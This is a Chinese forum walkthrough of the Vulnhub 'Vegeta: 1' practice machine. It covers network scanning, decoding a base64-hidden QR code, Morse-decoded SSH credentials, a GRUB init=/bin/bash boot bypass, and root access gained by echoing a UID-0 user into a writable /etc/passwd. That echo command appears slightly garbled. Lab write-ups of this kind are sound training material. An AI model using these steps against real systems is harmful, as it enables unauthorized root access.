|
本帖最后由 jiangmingzi 于 2023-10-6 03:46 编辑
衡阳信安 2023-10-03 00:00 发表于湖南
一、靶机配置
靶机地址:https://www.vulnhub.com/entry/vegeta-1,501/
我攻击机网络模式是nat模式,所以靶机也设置为nat模式
有可能存在扫不到靶机ip情况,需要做些设置:
1、靶机开启后进入这个界面按下e键
2、将ro 改成 rw signie init=/bin/bash
3、设置成功后按下ctrl键+x键,进入bash界面
4、一般这种情况都是网卡没配好的原因,首先查看下系统内核属于debian,命令cat /etc/*-release,或者uname -a也可以
5、ip a 查看网卡信息,debian中/etc/network/interfaces文件是网卡配置信息,对比发现网卡名字不同
6、将enp0s3那两条配置信息改成
auto ens33
iface ens33 inet dhcp
将ipv6那个注释掉
7、重启网络,/etc/init.d/networking restart,然后ip就正常了
二、信息收集
1、nmap -sn 10.10.10.0/24 扫描下攻击机同网段ip,发现目标ip为10.10.10.130
2、nmap -Pn -A -p- 10.10.10.130 扫下ip,发现开启22和80端口
3、22端口没有发现可利用点。访问80端口,只有一张贝吉塔图片
4、目录扫描一波,我用的是webpathscan工具(https://github.com/Matrix-Cain/WebPathScanner.git),pathmap.exe scan url http://10.10.10.130
5、所有目录都访问了一遍在robots.txt文件中发现另一个隐藏目录,http://10.10.10.130/find_me,访问
6、看网页没发现什么,看了下源码发现一串疑似base64加密的字符串
7、将这串字符串解密后还是一串加密字符串,进行二次解码,发现这是图片隐写
8、写了一个图片解密的python脚本,也可找一找相关图片隐写解密工具
- import base64
- from io import BytesIO
- from PIL import Image
- base64_data = "aVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQU1nQUFBRElDQVlBQUFDdFdLNmVBQUFIaGtsRVFWUjRuTzJad1k0c09RZ0U1LzkvK3UyMU5TdTdCd3JTaVN0QzhoR2M0SXBMOTg4L0FGanljem9BZ0RNSUFyQUJRUUEySUFqQUJnUUIySUFnQUJzUUJHQURnZ0JzUUJDQURRZ0NzQUZCQURhRUJmbjUrUmwvbk9aTFAxeER6K3g5VTA1cWJoWjFkcjRzSFQyejkwMDVxYmxaMU5uNXNuVDB6TjQzNWFUbVpsRm41OHZTMFRONzM1U1RtcHRGblowdlMwZlA3SDFUVG1wdUZuVjJ2aXdkUGJQM1RUbXB1Vm5VMmZteWRQVE0zamZscE9hdVhKUVRUamxkSHZ0YmxvNDZOUWp5UjV4eUlvZ09CUGtqVGprUlJBZUMvQkdubkFpaUEwSCtpRk5PQk5HQklIL0VLU2VDNkVDUVArS1VFMEYwakJWRS9aSGM4SEhkUHZ1RWQwZVF3N003MWFtelRIaDNCRGs4dTFPZE9zdUVkMGVRdzdNNzFhbXpUSGgzQkRrOHUxT2RPc3VFZDBlUXc3TTcxYW16VEhoM0JEazh1MU9kT3N1RWQwZVFJcWJNNENUcmhKMGhTQkZUWmtDUUdBaFN4SlFaRUNRR2doUXhaUVlFaVlFZ1JVeVpBVUZpSUVnUlUyWkFrQmdJVXNTVUdSQWtCb0lVMFRHZjAxN2UrdTRJVXNScEtSRGtXYzVsdjNEQlN4ZjFqZE5TSU1pem5NdCs0WUtYTHVvYnA2VkFrR2M1bC8zQ0JTOWQxRGRPUzRFZ3ozSXUrNFVMWHJxb2I1eVdBa0dlNVZ6MkN4ZThkRkhmT0MwRmdqekx1ZXdYTGhCL2VGazZjcm84Mm9rc2IzMTNCQkgwdkNITFc5OGRRUVE5YjhqeTFuZEhFRUhQRzdLODlkMFJSTkR6aGl4dmZYY0VFZlM4SWN0YjN4MUJCRDF2eVBMV2R5OFZaTXJwV1BDYjY2YWNEQWdTbUkrNjJTY0RnZ1RtbzI3MnlZQWdnZm1vbTMweUlFaGdQdXBtbnd3SUVwaVB1dGtuQTRJRTVxTnU5c25nOVNPMkFjcmxQN212SXd2OEg3YjVDd1NCVDlqbUx4QUVQbUdidjBBUStJUnQvZ0pCNEJPMitRc0VnVS9ZNWk4UUJENlIvUS9pMURPTFU4OHBkV3FxY3lKSTBlenFubFBxMUNBSWdveXFVNE1nQ0RLcVRnMkNJTWlvT2pVSWdpQ2o2dFFnQ0lLTXFsTnpYQkExYnhZeWk5TU1UbStVeWwvZXNSZ0VpZU0wZzlNYnBmS1hkeXdHUWVJNHplRDBScW44NVIyTFFaQTRUak00dlZFcWYzbkhZaEFranRNTVRtK1V5bC9lc1JnRWllTTBnOU1icGZLWGR5d0dRZUk0emVEMFJxbjhwYzJTUTcxWkFxZlpwd2pTVWJmc2w2cEtoRU1RajV3SUVzeWZxa3FFUXhDUG5BZ1N6SitxU29SREVJK2NDQkxNbjZwS2hFTVFqNXdJRXN5ZnFrcUVReENQbkFnU3pKK3FTb1JERUkrY0NCTE1uNm9xRHVleWpLNmVhcHdFNmNpWjdabkttS29xRHVleWpLNmVhaEFFUVI3VnFYdXFRUkFFZVZTbjdxa0dRUkRrVVoyNnB4b0VRWkJIZGVxZWFoQUVRUjdWcVh1cVFaQ0JncWcvNWpmZjEvRngzUzdXOHE2cHdia1BRUkNFK3hDa01HZnFycW5CdVE5QkVJVDdFS1F3WitxdXFjRzVEMEVRaFBzUXBEQm42cTdLY0ZtY0hzYnBvM1RLMlpGbEFnaHlPQXVDZUlNZ2g3TWdpRGNJY2pnTGduaURJSWV6SUlnM0NISTRDNEo0Z3lDSHN5Q0lONldDM1A0d1RvL3RKTEo2TDhvc0NGSjBueG9FUVpDMkxCMzNxVUVRQkduTDBuR2ZHZ1JCa0xZc0hmZXBRUkFFYWN2U2NaOGFCRUdRdGl3ZDk2bEJrSUdDZE5TcGUyYnZVMzk0Nm5mb3lPazAzN0pmdU1Ba2VGZlA3SDFPSDE3MlBuVk9wL21XL2NJRkpzRzdlbWJ2Yy9yd3N2ZXBjenJOdCt3WExqQUozdFV6ZTUvVGg1ZTlUNTNUYWI1bHYzQ0JTZkN1bnRuN25ENjg3SDNxbkU3ekxmdUZDMHlDZC9YTTN1ZjA0V1h2VStkMG1tL1pMMXhnRXJ5clovWStwdzh2ZTU4NnA5Tjh5MzdoQXZHSGZzUHlPN0pNMmFkNlp3aGkrbWdkODkyd1R3UzU3RUU3WmtjUUJMbm1RVHRtUnhBRXVlWkJPMlpIRUFTNTVrRTdaa2NRQkxubVFUdG1SNUFYQ1hJNzZnKzJBN1dRSFZrNnhFcmxUMVZkRElKNFpFRVFVeERFSXd1Q21JSWdIbGtReEJRRThjaUNJS1lnaUVjV0JERUZRVHl5akJXa1kyRDFjV0xLQitUeXdYNERRUkFFUVlUM0ljaGhFS1FXQkVFUUJCSGVoeUNIUVpCYUVBUkJFRVI0SDRJY0JrRnFzUmJFaVk2Y04zek1UaCtzK28xUy9VNEg2QUpCRUFSQk5pQUlnaURJQmdSQkVBVFpnQ0FJZ2lBYkVBUkJFR1FEZ2lESUtFRnUrTGc2NW5QSzRuVFV1MTdlRlM0d2VqUjF6bzc1bkxJNEhmV3VsM2VGQzR3ZVRaMnpZejZuTEU1SHZldmxYZUVDbzBkVDUreVl6eW1MMDFIdmVubFh1TURvMGRRNU8rWnp5dUowMUx0ZTNoVXVNSG8wZGM2TytaeXlPQjMxcnBkM2hRdU1IazJkczJNK3B5eE9SNzNyNVYzaEFxTkhVK2QwMnN1VUxOTnpJb2h4M1ExWnB1ZEVFT082RzdKTXo0a2d4blUzWkptZUUwR002MjdJTWowbmdoalgzWkJsZWs0RU1hNjdJY3YwbkFoU3hKUVoxRDJuZkMvTEhKWExjQm9ZUVR4NlR2bGVsamtxbCtFME1JSjQ5Snp5dlN4elZDN0RhV0FFOGVnNTVYdFo1cWhjaHRQQUNPTFJjOHIzc3N4UnVReW5nUkhFbytlVTcyV1pvM0laVGdNamlFZlBLZC9MTWtmbE1weVk4bEVxSC9zSlRoODZnaFNBSUxVZ1NQT2kxQ0JJTFFqU3ZDZzFDRklMZ2pRdlNnMkMxSUlnell0U2d5QzFJRWp6b3RRZ1NDMElVckNvS1NjN245TmVzcHplZmNVTTJmbFMvU29EVERrZEMzYWF3U2tuZ2d3OEhRdDJtc0VwSjRJTVBCMExkcHJCS1NlQ0REd2RDM2Fhd1NrbmdndzhIUXQybXNFcEo0SU1QQjBMZHByQktlZnJCQUY0RXdnQ3NBRkJBRFlnQ01BR0JBSFlnQ0FBR3hBRVlBT0NBR3hBRUlBTkNBS3dBVUVBTmlBSXdBWUVBZGp3SHlVRnd2VnIwS3ZGQUFBQUFFbEZUa1N1UW1DQw=="
- # 第一次解码 base64 数据
- image_data1 = base64.b64decode(base64_data)
- # 第二次解码 base64 数据
- image_data2 = base64.b64decode(image_data1)
- # 创建 BytesIO 对象
- image_stream = BytesIO(image_data2)
- # 打开图片
- image = Image.open(image_stream)
- # 显示图片
- image.show()
复制代码
运行脚本后显示一个二维码图片
9、解码后得到一个密码,尝试了下root登录发现失败
10、思路到这里断了,看了下别人打靶文章发现还扫出了一个目录bulma。vulnhub靶机都是基于kali中自带的字典来设置目录路径或密码的,所以使用kali自带的字典可以爆出这个目录,一般的目录爆破工具爆不出来
11、点开音频文件是一段莫斯密码,这里没有解密,直接看了别人的解密结果(在线解码地址:https://morsecode.world/internat ... decoder-expert.html)。解密后可以得到一个用户名和密码trunks:u$3r,尝试ssh登录,登录成功
三、内网信息收集
1、查看下账号权限,发现是普通用户
2、看下当前目录有什么文件
3、看下passwd文件和shadow文件权限,passwd文件存在读写权限
四、linux提权
1、passwd文件提权,首先生成一个加密密码。可以直接使用kali中的openssl生成,openssl passwd -1。这里生成了一个密码为123的加密密码
2、echo 'test1$imGj2JWO$YVM/Yh0cfGHtlm7Uz5vKw/:0:0:root:/root:/bin/bash' >>/etc/passwd,向passwd文件中写入一个用户名为test,密码123的用户,权限为root。写入成功会显示出来,失败则会显示不全
五、get flag
1、直接su test 切换账号
2、切换到root目录下,获得flag
六、总结
这个靶机挺简单的,主要考察了图片解密,莫斯音频解密,passwd文件提权,还有就是bulma这个目录可能扫不出来。
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|